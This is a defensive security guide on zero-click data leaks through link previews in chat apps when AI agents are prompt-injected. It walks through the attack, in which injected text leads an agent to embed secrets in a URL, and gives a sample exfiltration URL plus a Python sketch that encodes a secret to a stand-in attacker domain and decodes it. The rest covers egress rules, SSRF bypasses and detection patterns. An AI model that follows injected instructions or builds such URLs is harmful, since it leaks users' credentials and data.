A link preview feels harmless. Your chat app fetches a title, an image, and a short snippet. No one clicks anything.
That’s the problem. Link preview attacks can turn that “helpful” fetch into a zero-click data leak, especially when an AI agent can read internal context and then generate URLs.
This piece focuses on practical defenses for teams building agents that post messages, generate links, or trigger preview fetchers in Slack, Teams, Discord, Telegram, and similar tools.
## Why link previews create zero-click data exfiltration
Most messaging platforms and collaboration tools auto-fetch previews. They do it to render Open Graph cards, unfurl links, or pre-load media. If an AI agent posts a message containing a URL, the platform’s preview bot often fetches it right away.
In February 2026 reporting, researchers showed agents leaking secrets when a malicious prompt caused the agent to construct a URL that embedded sensitive data (API keys, tokens, snippets of internal text). The preview fetch then sent that data to an attacker-controlled domain without a click. See AI agents can spill secrets via malicious link previews for examples tied to real chat workflows.
Here’s the mental model: a URL is like the address line on a postcard. If you write a secret there (query string, path, fragment that gets misused), it can get copied, logged, and forwarded.
Treat every automatic preview fetch as an outbound network request that may carry data you didn’t mean to publish.
Scope note: this risk exists even if your agent never “browses the web.” It’s enough that (1) the agent can generate text containing links, and (2) some system auto-fetches previews for those links.
## How secrets end up inside attacker URLs
Attackers don’t need malware. They need the agent to cooperate for one message.
A common pattern looks like this:
- An attacker sends a message that includes an instruction disguised as normal text (prompt injection).
- The agent includes sensitive context in its next response, but not as plain text. Instead, it encodes the data into a URL, often as `https://attacker.tld/collect?d=<secret>`.
- The chat platform unfurls the link, fetching it server-side. The attacker's server receives the request and extracts the secret.
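The encoding step is trivial, which is part of why it slips past review. A sketch of both sides, assuming a hypothetical collector domain (`attacker.example`) and parameter name (`d`):

```python
import base64
from urllib.parse import parse_qs, urlsplit

# Hypothetical exfil URL: the secret rides in the query string, so every
# server, proxy, and log that sees the URL also sees the secret.
secret = b"sk-live-123"
url = "https://attacker.example/collect?d=" + base64.urlsafe_b64encode(secret).decode()

# What a collector endpoint does when the preview fetch arrives:
params = parse_qs(urlsplit(url).query)
recovered = base64.urlsafe_b64decode(params["d"][0])
assert recovered == secret
```

No JavaScript, no exploit: one HTTP GET issued by the preview bot completes the exfiltration.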
The “secret” can come from several places: tool output (CRM records, ticket bodies, calendar titles), long-term memory, system prompts, connected files, environment variables accidentally exposed to the model, or even earlier chat messages copied into the response.
Two details make link preview attacks easier to miss:
- Logs amplify the leak. URLs often land in proxy logs, WAF logs, browser history, and APM traces. Even if you later delete the message, the URL may already exist elsewhere.
- Redirects hide intent. The URL shown to the user can look safe, then redirect to a collector endpoint during preview fetching.
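Countering the redirect trick means approving each hop yourself rather than letting an HTTP client follow `Location` headers silently. A minimal sketch; `validate_redirect` and the `MAX_HOPS` value are illustrative, not a complete implementation:

```python
from urllib.parse import urlsplit

MAX_HOPS = 3  # assumption: tune for your fetcher

def validate_redirect(current_url: str, location: str, hop: int) -> str:
    """Approve a single redirect hop, or raise. Re-run this on every hop."""
    if hop > MAX_HOPS:
        raise ValueError("redirect chain too long")
    cur, nxt = urlsplit(current_url), urlsplit(location)
    if nxt.scheme != "https":
        raise ValueError("redirect downgrades scheme")
    if nxt.hostname != cur.hostname:
        # Cross-domain redirects are how a "safe-looking" link
        # reaches an attacker's collector endpoint.
        raise ValueError(f"cross-domain redirect to {nxt.hostname}")
    return location
```

A production fetcher should also re-resolve DNS and re-check the resolved IPs at every hop, for the same reasons the initial request needs those checks.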
OpenAI’s January 2026 guidance summarizes this class of “URL-based data exfiltration” and why agents need strict guardrails around link handling. See Keeping your data safe when an AI agent clicks a link.
## Hardening against link preview attacks (controls that survive bypass tricks)
You won’t stop every prompt injection. You can still stop most leaks by controlling what gets fetched, where it can go, and what data is allowed to enter a URL.
Before controls, it helps to name the bypasses. This table maps common tricks to matching defenses.
| Bypass technique attackers use | What it looks like | Defense that holds up |
|---|---|---|
| Canonicalization confusion | http://user@host, mixed case, trailing dots, encoded IPs | Normalize and re-parse, then compare against a strict allowlist |
| Multiple A and AAAA records | Domain resolves to one public IP and one private IP | Resolve all records, block if any are private, link-local, or loopback |
| Redirect chains | Safe domain redirects to attacker collector | Re-validate every hop, cap redirects, block cross-domain redirects |
| DNS rebinding | Domain resolves public first, private later | Pin IP per request, don’t re-resolve mid-flight, use a safe resolver |
| Metadata service probing | 169.254.169.254 and cloud variants | Network egress blocks plus explicit deny rules at the proxy |
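Several of those defenses compose into a single pre-fetch gate. A sketch in Python using only the standard library; the allowlist contents are placeholders, and real deployments should pair this with network-level egress blocks rather than rely on application code alone:

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWLIST = {"example.com", "docs.example.com"}  # hypothetical allowlist

def is_fetchable(raw_url: str) -> bool:
    """Normalize, allowlist-check, and resolve a URL before any fetch (sketch)."""
    parts = urlsplit(raw_url)
    if parts.scheme != "https":
        return False
    # .hostname drops userinfo and the port, and lowercases the host;
    # stripping the trailing dot defuses "host." canonicalization tricks.
    host = (parts.hostname or "").rstrip(".")
    if host not in ALLOWLIST:
        return False
    # Resolve ALL A/AAAA records; reject if ANY is non-public.
    try:
        infos = socket.getaddrinfo(host, 443, proto=socket.IPPROTO_TCP)
    except socket.gaierror:
        return False
    for *_, sockaddr in infos:
        ip = ipaddress.ip_address(sockaddr[0])
        if ip.is_private or ip.is_loopback or ip.is_link_local or not ip.is_global:
            return False
    return True
```

To resist DNS rebinding, the connection itself must then be pinned to one of the IPs checked here, not re-resolved by the HTTP client.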
### Implementation snippets you can apply today
The safest pattern is an isolated “preview fetcher” service with no secrets, no internal network access, and tight outbound rules. Then treat preview results as untrusted input.
Below are concrete examples you can adapt (concepts stay the same across stacks):
- Egress firewall rules (block internal targets): deny RFC 1918, loopback, link-local, and cloud metadata ranges. For example, block `10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`, `127.0.0.0/8`, `::1/128`, `fc00::/7`, `fe80::/10`, and `169.254.169.254/32`. If you need a quick host-level control, rules like `iptables -A OUTPUT -d 169.254.169.254 -j REJECT` and `iptables -A OUTPUT -d 10.0.0.0/8 -j REJECT` are a starting point, but prefer VPC or cluster-level egress policy.
- Reverse proxy "choke point" (deny by resolved IP): force all preview fetches through one proxy that performs DNS resolution and blocks private ranges. This prevents individual agent code paths from making direct requests. Also disable forwarding of cookies and auth headers by default.
- Safe URL fetching pseudocode (defensive, not pretty):

  ```
  u = parse_url(input)
  if u.scheme not in {"https"}: reject
  u = normalize(u)                     // lowercase host, strip userinfo, clean escapes
  if host_in_allowlist(u.host) is false: reject (or require user confirm)
  ips = resolve_all_A_AAAA(u.host)
  if any_ip_is_private_or_linklocal(ips): reject
  ip = pick_ip_and_pin(ips)
  req = new_request("GET", u, connect_to=ip)
  req.headers = {"User-Agent": "PreviewFetcher/1.0", "Accept": "text/html,image/*"}
  req.remove_headers(["Authorization", "Cookie", "X-Api-Key"])
  resp = fetch(req, timeout=3s, max_bytes=1MB, no_proxy_env=true)
  if is_redirect(resp): next = validate_redirect(resp.location, same_checks=true, max_hops=3)
  return extract_title_and_og_tags(resp)   // no scripting, no forms
  ```
- Output guardrails (stop secrets entering URLs): if your agent generates links, add a post-processor that rejects URLs containing high-risk patterns. Examples: long base64 blobs, `token=`, `key=`, `sig=`, or unexpected percent-encoded payloads. Pair this with a "never put secrets in URLs" rule for any tool your agent calls.
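Such a post-processor can start as a handful of heuristics. A sketch; the patterns and thresholds below are assumptions to tune against your own traffic, not a complete DLP engine:

```python
import re

# Heuristic signals that a URL may be carrying a secret (illustrative).
SUSPICIOUS = [
    re.compile(r"[?&](token|key|sig|secret|password)=", re.I),  # credential-style params
    re.compile(r"[A-Za-z0-9+/_-]{40,}"),                        # long base64-ish blob
    re.compile(r"(%[0-9A-Fa-f]{2}){10,}"),                      # long percent-encoded payload
]

def url_looks_exfiltrating(url: str) -> bool:
    """Flag agent-generated URLs that match any high-risk pattern."""
    return any(p.search(url) for p in SUSPICIOUS)
```

Flagged URLs can be dropped, defanged, or routed to human review; expect some false positives and log them so the patterns can be refined.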
One more practical point: many preview fetchers run in the same environment as the agent. That’s convenient, but it’s risky. If the preview worker can reach internal services, attackers will try SSRF-style targets next.
For hands-on examples of how preview-driven exfil can appear in messaging apps, including testing workflows, see Data exfil from agents in messaging apps.
### Copy-paste checklist for an engineering ticket
Use this as acceptance criteria for a sprint task:
- Create a dedicated preview-fetch service (or job) with no access to internal networks and no secret mounts.
- Enforce outbound egress policy that blocks private, loopback, link-local, and metadata IP ranges (IPv4 and IPv6).
- Require `https` and normalize URLs (strip userinfo, normalize host casing, decode and re-parse).
- Resolve all A and AAAA records, block if any record is non-public, pin the chosen IP for the connection.
- Re-validate every redirect hop, cap redirect count, block cross-domain redirects unless allowlisted.
- Strip sensitive headers (Authorization, cookies, API keys) from all preview requests.
- Add strict timeouts and size caps, log only minimal metadata (don’t log full URLs with query strings).
- Add an outbound DLP-style filter that rejects agent-generated URLs containing suspected secrets.
## Product and UX choices that reduce the blast radius
Engineering controls help, but product defaults decide how often you face the problem.
For sensitive workspaces (security teams, finance, legal, incident response), consider disabling link previews by default for agent messages. If you can’t disable previews platform-wide, disable them for agent identities or channels that contain sensitive data.
Consent prompts also work when designed well. For example: “This link points to an untrusted domain. Generate preview anyway?” That prompt should appear before any fetch happens, not after.
The strongest option is an isolated preview service that returns a safe summary (title, domain, content-type) and never returns raw HTML. Treat it like a sanitizer, not a browser.
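The sanitizer's output contract can be tiny. A sketch using only the stdlib HTML parser; the `safe_summary` function and its field names are illustrative, and the key property is that raw markup never leaves the service:

```python
from html.parser import HTMLParser

class OGExtractor(HTMLParser):
    """Pull only the title and Open Graph meta tags out of untrusted preview HTML."""
    def __init__(self):
        super().__init__()
        self.og = {}
        self.title = ""
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and a.get("property", "").startswith("og:"):
            self.og[a["property"]] = a.get("content", "")
        elif tag == "title":
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data

def safe_summary(html: str, domain: str) -> dict:
    """Return a small, truncated dict; never raw HTML, scripts, or forms."""
    p = OGExtractor()
    p.feed(html)
    return {"domain": domain,
            "title": (p.og.get("og:title") or p.title)[:200]}
```

Because callers only ever receive a short dict, a malicious page can at worst control a truncated title string, not inject markup into the chat client.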
## Conclusion
Link previews are small features with big consequences. When an AI agent can produce URLs from internal context, link preview attacks turn into quiet, fast data leaks.
Build a separate preview fetcher, lock down egress, validate DNS and redirects, and stop secrets from entering URLs. Then back it up with sensible defaults, because the safest preview is the one that never fires.

